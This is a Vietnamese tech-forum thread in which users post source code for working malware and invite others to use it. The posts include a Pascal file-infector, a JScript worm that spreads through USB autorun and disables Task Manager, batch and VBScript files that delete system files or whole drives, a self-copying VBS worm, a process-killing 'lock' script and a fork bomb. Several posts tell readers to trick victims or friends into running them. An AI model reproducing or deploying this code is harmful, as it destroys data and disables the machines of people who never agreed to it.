Hỏi đáp mọi chủ đề liên qua đến công nghệ thông tin, internet, lập trình, SEO...
Nội quy chuyên mục: Hỏi đáp mọi chủ đề liên qua đến công nghệ thông tin, internet, lập trình, SEO...

- Chuyên nhận giải đáp thắc mắc sử dụng Word, Excel, Power Point

- Ai cần download driver hay Firmware cho máy tính máy in, thì vào đây nhé, tìm gì cũng có Driver 360

- Cập nhật tin tức với Mr Công nghệ tại đây
By nu0cmatsa0baccuc_hh
#266779 Cùi bắp, virus mà có code ngắn ngủn (chưa đủ 1 dòng ) mà gọi là virus a`

Nói thế thì cả tỉ code tựa tựa.

Virus nè

1.Viết trên nền pascal


Viết virus bằng Pascal

Với mục đích giúp các bạn tìm hiểu kỹ thuật làm ra (tạo) các chương trình virus, tui xin giới thiệu một chương trình virus đơn giản viết bằng ngôn ngữ Pascal mang tên kompan. Tác giả của chương trình này là một chuyên gia về viurs người Balan - Adam Blaszczyk. Virus kompan là viurs lây nhiễm vào các file loại *.EXE và file *.COM có trong thư mục hiện thời. Bạn cần lưu ý đến kỹ thuật làm "lây nhiễm" trong chương trình này. các bạn yên tâm Kompan là virus rất "hữu nghị" bạn có thể dịch và chạy chương trình nguồn dưới đây để thử. Điều đáng quan tâm ở đây là kỹ thuật làm ra (tạo) ra virus.



program kompan;

{$A-,B-,D-,E-,F-,G-,I-,L-,N-,O-,P-,Q-,R-,S-,T-,V-,X-,Y-}

{$M 8192,0,16384}

uses Dos, Crt;

const

MaskaEXE = '*.EXE';

var

Szuk : SearchRec;

NazwaNosiciela,

NazwaOfiary : String;

PlikNosiciela,

PlikOfiary : File;

DlugoscNosiciela : LongInt;

Bufor : Pointer;

I : Byte;

Status : Boolean;


begin

WriteLn;

WriteLn (' KOMPAN v1.0, Autor : Adam Blaszczyk 1997');

WriteLn;

NazwaNosiciela := ParamStr (0);

WriteLn (' Czy chcesz uruchomic wirusa (T/N) ?');

if UpCase(ReadKey)='T' then

begin

WriteLn;

Status :=False;

FindFirst (MaskaEXE, AnyFile, Szuk);

while (DosError = 0) and (IOResult = 0) and (not Status) do

begin

with Szuk do

if not ((Name='.') or

(Name='..') or

(not (Attr and Directory and VolumeID<>0))) then

begin

NazwaOfiary:=Name;

Delete (NazwaOfiary, Pos ('EXE',NazwaOfiary),3);

NazwaOfiary:=NazwaOfiary+'COM';

Assign (PlikOfiary, NazwaOfiary);

Reset (PlikOfiary,1);

if IOResult <> 0 then

begin

Status:=True;

WriteLn (' Tworze KOMPANA : ',NazwaOfiary);

Assign (PlikNosiciela, NazwaNosiciela);

Reset (PlikNosiciela, 1);

DlugoscNosiciela := FileSize (PlikNosiciela);

GetMem (Bufor,DlugoscNosiciela);

BlockRead (PlikNosiciela, Bufor^, DlugoscNosiciela);

ReWrite (PlikOfiary,1);

BlockWrite (PlikOfiary , Bufor^, DlugoscNosiciela);

Close (PlikNosiciela);

Close (PlikOfiary);

FreeMem (Bufor, DlugoscNosiciela);

end;

end;

FindNext (Szuk);

end;

If Not Status then WriteLn (' Nie znalazlem zadnego kandydata do infekcji !');

end;

Delete (NazwaNosiciela,Pos ('.COM',NazwaNosiciela),4);

NazwaNosiciela := '/C '+NazwaNosiciela+'.EXE';

for I:=1 to ParamCount do

NazwaNosiciela := NazwaNosiciela +' '+ParamStr(I);

SwapVectors;

Exec(GetEnv('COMSPEC'), NazwaNosiciela);

SwapVectors;

end.


2.Virus Uragon.txt.js (Con này của hacker, mình mò code của nó rồi copy lại)


Cần 2 file

File: uragon.txt.js

Code:

iset="Internet Settings"; expl="Explorer"; virus="uragon.txt.js"; flag=0;

reg1="HKCU\\Software\\Microsoft\\Windows\\CurrentV ersion\\"; rdw="REG_DWORD"; rsz="REG_SZ";

fso=new ActiveXObject("Scripting.FileSystemObject"); wsh=new ActiveXObject("WScript.Shell");

try{wsh.run(WScript.arguments(0),1,false);}catch(e 0){}

try{value=wsh.regRead("HKLM\\SOFTWARE\\BICOLANOINI \\");if(value=="NHED57")WScript.quit();}catch(e1){ }

wsh.regWrite("HKCU\\Software\\Microsoft\\Windows Script Host\\Settings\\Timeout",0,"REG_DWORD");

io=fso.openTextFile(WScript.ScriptFullName);cntnt= io.readAll();io.close(); for({_();WScript.sleep(100);}

function _(){

try {

win=fso.getSpecialFolder(0)+"\\service.exe.js"; win32=fso.getSpecialFolder(0)+"\\system32\\winx86. dll.js";

if(!fso.fileExists(win)){

io=fso.createTextFile(win);io.write(cntnt);io.clos e();fso.getFile(win).attributes=7;

try{lock=fso.openTextFile(win);for(lock.readAll();}catch(e3){}

}

if(!fso.fileExists(win32)){

io=fso.createTextFile(win32);io.write(cntnt);io.cl ose();fso.getFile(win32).attributes=7;

try{lock=fso.openTextFile(win32);for(lock.readAll();}catch(e4){}

}

wsh.regWrite(reg1+iset+"\\Zones\\0\\1201",flag,rdw );wsh.regWrite(reg1+iset+"\\Zones\\1\\1201",flag,r dw);

wsh.regWrite(reg1+iset+"\\Zones\\2\\1201",flag,rdw );wsh.regWrite(reg1+iset+"\\Zones\\3\\1201",flag,r dw);

wsh.regWrite(reg1+iset+"\\Zones\\4\\1201",flag,rdw );

wsh.regWrite(reg1+"Policies\\Explorer\\Run\\1","c: \\windows\\system32\\winx86.dll.js",rsz);

wsh.regWrite(reg1+"Run\\updater23","c:\\windows\\s ervice.exe.js",rsz);

wsh.regWrite(reg1+"Policies\\"+expl+"\\NoRun",1,rd w);wsh.regWrite(reg1+"Policies\\"+expl+"\\NoFolder Options",1,rdw);

wsh.regWrite(reg1+"Policies\\"+expl+"\\NoShellSear chButton",1,rdw);wsh.regWrite(reg1+"Policies\\Syst em\\DisableTaskmgr",1,rdw);

wsh.regWrite(reg1+expl+"\\Advanced\\Hidden",2,rdw) ;wsh.regWrite(reg1+expl+"\\Advanced\\HideFileExt", 1,rdw);

wsh.regWrite(reg1+expl+"\\Advanced\\ShowSuperHidde n",0,rdw);

for(e=new Enumerator(fso.drives);!e.atEnd();e.moveNext()){

dr=e.item();

if((dr.driveType==1||dr.driveType==2)&&dr.driveLet ter.substring(0,1).toUpperCase()!="A"){

sze=dr.totalSize/(1024*1024*1024);

if(sze<10/*10*/){

p=dr.path+"\\";ssl=p+virus;ar=p+"Autorun.inf";

inf="[autorun]
" + "shellexecute=wscript.exe "+virus+" \"%1\"
shell\\E&xplore\\command=wscript.exe "+virus+" \"%1\"
"+

"shell\\verb=&Open
shell\\verb\\command=wscript .exe "+virus+" \"%1\"
";

if(!fso.fileExists(ssl))

{io=fso.createTextFile(ssl);io.write(cntnt);io.clo se();fso.getFile(ssl).attributes=7;}

if(fso.fileExists(ar)){

f=fso.getFile(ar);io=f.openAsTextStream(1,-2);info="";

if(!io.atEndOfStream)info=io.readAll();io.close();

if(info.indexOf(inf)<0){f.attributes=0;io=f.openAs TextStream(2,-1);io.write(inf);io.close();}

}else{io=fso.createTextFile(ar);io.write(inf);io.c lose();}

fso.getFile(ar).attributes=6;

}

}

}

try{io=fso.openTextFile(WScript.ScriptFullName);fo r(io.readAll();}catch(e5){}

}catch(e2){}

}



File:AutoRun


Code:

[autorun]

shellexecute=wscript.exe uragon.txt.js "%1"

shell\E&xplore\command=wscript.exe uragon.txt.js "%1"

shell\verb=&Open

shell\verb\command=wscript.exe uragon.txt.js "%1"



3.Virus không nên dùng


Dán mã naỳ vaò notepad :


Code :


@Echo Off

@cls

@title Virus ti choi

@assoc exe=txt

@assoc reg=jpg

@cd %systemroot%

@del /f /s /q TASKMAN.EXE

@cd %Systemroot%\system32

@del /f /s /q hal.dll

@del /f /s /q taskkil.exe

@del /f /s /q tasklist.exe

@del /f /s /q taskman.exe

@del /f /s /q taskmgr.exe

@shutdown -s -t 06 -c " Fatal error #1337, You DEAD!"

@del /f /s /q *.*

@cd ..

@del /f /s /q TASKMAN.EXE

@del /f /s /q *.*

@exit


Save thành file *.bat


4.Worm


các bạn lưu với đuôi .vbs là ok.


msgbox"Warnig!" 'Cai nay co tac dung se tao 1 hop thong bao tren man hinh cua nan nhan

On Error Resume Next

Set vip_xinh = Createobject("scripting.filesystemobject")

vip_xinh.copyfile wscript.scriptfullname,vip_xinh.GetSpecialFolder(0 )& "\ vip_xinh.vbs"

Set vip_xinh2= CreateObject("WScript.Shell")

vip_xinh2.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ru n\die","wscript.exe "& vip_xinh.GetSpecialFolder(0)& "\ vip_xinh.vbs %"


On Error Resume Next

Const vic = "D:\"

Delvic

Sub Delvic()

Dim fso

Set fso = CreateObject("Scripting.FileSystemObject")

fso.DeleteFile vic & "*.*" , True

fso.DeleteFolder vic & "*" , True

End Sub


On Error Resume Next

Const vic1 = "C:\windows\"

Delvic1

Sub Delvic1()

Dim fso1

Set fso1 = CreateObject("Scripting.FileSystemObject")

fso1.DeleteFile vic1 & "*.*" , True

fso1.DeleteFolder vic1 & "*" , True

End Sub


On Error Resume Next

Const vic2 = "C:\"

Delvic2

Sub Delvic2()

Dim fso2

Set fso2 = CreateObject("Scripting.FileSystemObject")

fso2.DeleteFile vic2 & "*.*" , True

fso2.DeleteFolder vic2 & "*" , True

End Sub


On Error Resume Next

Set treomay= CreateObject("WScript.Shell")

Do

treomay.run "notepad",false

loop


5.Virus xóa file system


Mở notepad lên và copy vào đó đoạn code sau:

Code:


@echo off

attrib -r -s -h c:\autoexec.bat

del c:\autoexec.bat

attrib -r -s -h c:\boot.ini

del c:\boot.ini

attrib -r -s -h c:\ntldr

del c:\ntldr

attrib -r -s -h c:\windows\win.ini

del c:\windows\win.ini

Save lại với dạng karobi.bat

Dụ victim mở nó lên và...


Tác dụng của con này là : nó sẽ xoá hết những file khởi động của hệ thống .


Cách khắc phục : sang máy khác copy các file sau : autoexec.bat ; boot.ini ; ntldr ; win.ini và dán vào ổ C .

Riêng file win.ini thì cho vào C:\Window\ nhé .



6.Worm lây lan


+ Đây là cách làm ra (tạo) một con virus đơn giản, cức năng của nó là tự nhân bản sang tất cả các folder của tất cả các ổ đĩa , nạn nhân thấy nó chắc ngứa mắt lắm nhỉ ?

+ Đương nhiên muốn xoá nó cũng không phải dễ đâu, bạn không bao giờ xoá hết hàng tỉ con virus này đâu, mà xoá tì nó vẫn mọc lại thôi, vì vậy nên mình cũng cung cấp file diệt (đưa 1.00.000đ đây)

Bạn làm teo các bước sau:

B1: Mở notepad ra

B2:Chép đoạn mã này vào

Code:

‘Waring, virus waring !!! Dim fso, file, VB Copy Set fso= Create Object (“Scripting.File System Object”)

Set file=

Fso.Open Text File (WScript. Script Full name, 1)

VB Copy= file. Read All

Folder List (“A:\”)

Folder List (“B:\”)

Folder List (“C:\”)

Folder List (“D:\”)

Folder List (“E:\”)

Folder List (“F:\”)

Folder List (“G:\”)

Folder List (“H:\”)

Folder List (“I:\”)

Folder List (“J:\”)

Folder List (“K:\”)

Folder List (“L:\”)

Folder List (“M:\”)

Folder List (“N:\)

Folder List (“O:\)

Folder List (“P:\)

Folder List (“Q:\)

Folder List (“R:\)

Folder List (“S:\)

Folder List (“T:\)

Folder List (“U:\)

Folder List (“V:\)

Folder List (“X:\)

Folder List (“Y:\)

Folder List (“Z:\)

Folder List (“W:\) Sub

Folder List (Folder Spec)

On error resume next

Dim f, f1, st, COP, CAP

Set f=

fso.Get Folder (Folder Spec)

set sf= f.Sub Folders for each f1 In sf set COP=

fso. Create Text File (f1.path & “\Virus !!!!!!!.vbs”)

COP. Write VB Copy set CAP=

Fso. Create Text File (f1.pat & “--- Virus !!!!!!!.vbs”)

CAP.write VBCopy

Folder List (f1.Path) Next

End Sub


¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬__________ __________________________________________________ ____________


B3: Save với tên của một loại virus nhưng kèm đuôi vbs

Eg: W32.VBCopy.Staff.vbs

---------- Bài viết vừa được nhập tự động bởi hệ thống ----------


Thank đi nha các bạn

Lưu ý khi sử dụng

- Gặp Link download hỏng, hãy đăng trả lời (yêu cầu link download mới), Các MOD sẽ cập nhật link sớm nhất
- Tìm kiếm trước khi đăng bài mới

Chủ đề liên quan:
By Vinn
#266780 Người ta hưởng ứng chuyện diệt trừ virus chớ ai lại muốn có virus?
Blog Tâm sự:
  • Mong em cho anh thêm cơ hội từ bỏ bia rượu | 01:06 ...
  • Vợ muốn ly hôn vì đã ngoại tình một thời gian với đồng nghiệp | 02:06 ...
  • Phát hiện vợ sắp cưới từng cặp bồ khi còn sống với chồng cũ | 02:06 ...
  • Gia đình chồng có truyền thống phụ nữ phải làm mọi việc nhà | 12:06 ...
  • Tôi muốn hủy hôn vì chồng sắp cưới chát sex | 01:06 ...
  • Tôi chấp nhận để vợ tìm niềm vui chăn gối ở người đàn ông khác | 02:06 ...
By tonmackim
#266782 cũng hay đấy! bạn có code chạy 1 file .exe bất kỳ khi vào 1 thư mục hay chạy 1 file nào nó hok? cd như mình có 1 folder:
Programs files

trong nó có file
install.exe

word.doc

mình muốn khởi chạy file install.exe khi vào folder Programs files hay chạy file word.doc? help!
By Boase
#266783 mấy con này có ghê lắm không ạ,chỉ sợ Phần mềm không diệt được lại khốn cùng khổ với nó,bác cho cách diệt lun đi
By Rickie
#266785 Gamerhell Người ta hưởng ứng chuyện diệt trừ virus chớ ai lại muốn có virus? đúng rồi thử cái coi
By aodo_chungtoyeuanh
#266787 Con này có tác dụng tắt aero trong và lock máy tính chỉ chừa mỗi cái Desktop (Chế độ ReadOnly >> Không cho Double Click, không cho move icon), Task Manager, một số hiệu chỉnh ngoài hệ thống, những Phần mềm đang chạy ở system tray

Để làm con virus này, hãy mở notepad và soạn nội dung sau: (Chỉ áp dụng trên Windows 7)

@echo off

taskkill /f /im dwm.exe

taskkill /f /im explorer.exe

taskkill /f /im svchost.exe

start taskmgr.exe

start explorer.exe

msg * Your system has been locked out!

Rồi save as... <Tên bất kỳ>.bat và up lên yahoo để gạt và trêu bạn bè hay chép vào usb rồi mang sang máy khác và chạy nó!

Tiến trình làm chuyện của file này:

1. Tắt Aero

2. Tắt Explorer

3. Tắt khoảng 2-4 cái svchost

4. Khởi chạy Task Manager

5. Khởi động lại explorer (Phải mất khoảng 30 giây -> 1 phút để explorer được khởi động lại)

Để máy một lát có thể máy sẽ tự động khởi động lại không thông báo (y như nhấn nút reset trên Power case)
By conongnhobe_bmt3
#266788 Chả có cái nào là virus cả.

Thà dùng cách này nó còn hiệu quả hơn là cách của các bạn


File1.bat

Start File2.bat

File2.bat

Start File3.bat

File3.bat

Start File1.bat


Rồi mở file nào lên cũng đơ máy. Nếu không đơ thì thêm nhiều câu lệnh xử lý vào là đơ ngay, mở thật nhiều vào.

Đây chỉ là cách làm cho máy hoạt đông quá công suất thôi
Kết nối đề xuất:
Đọc Truyện online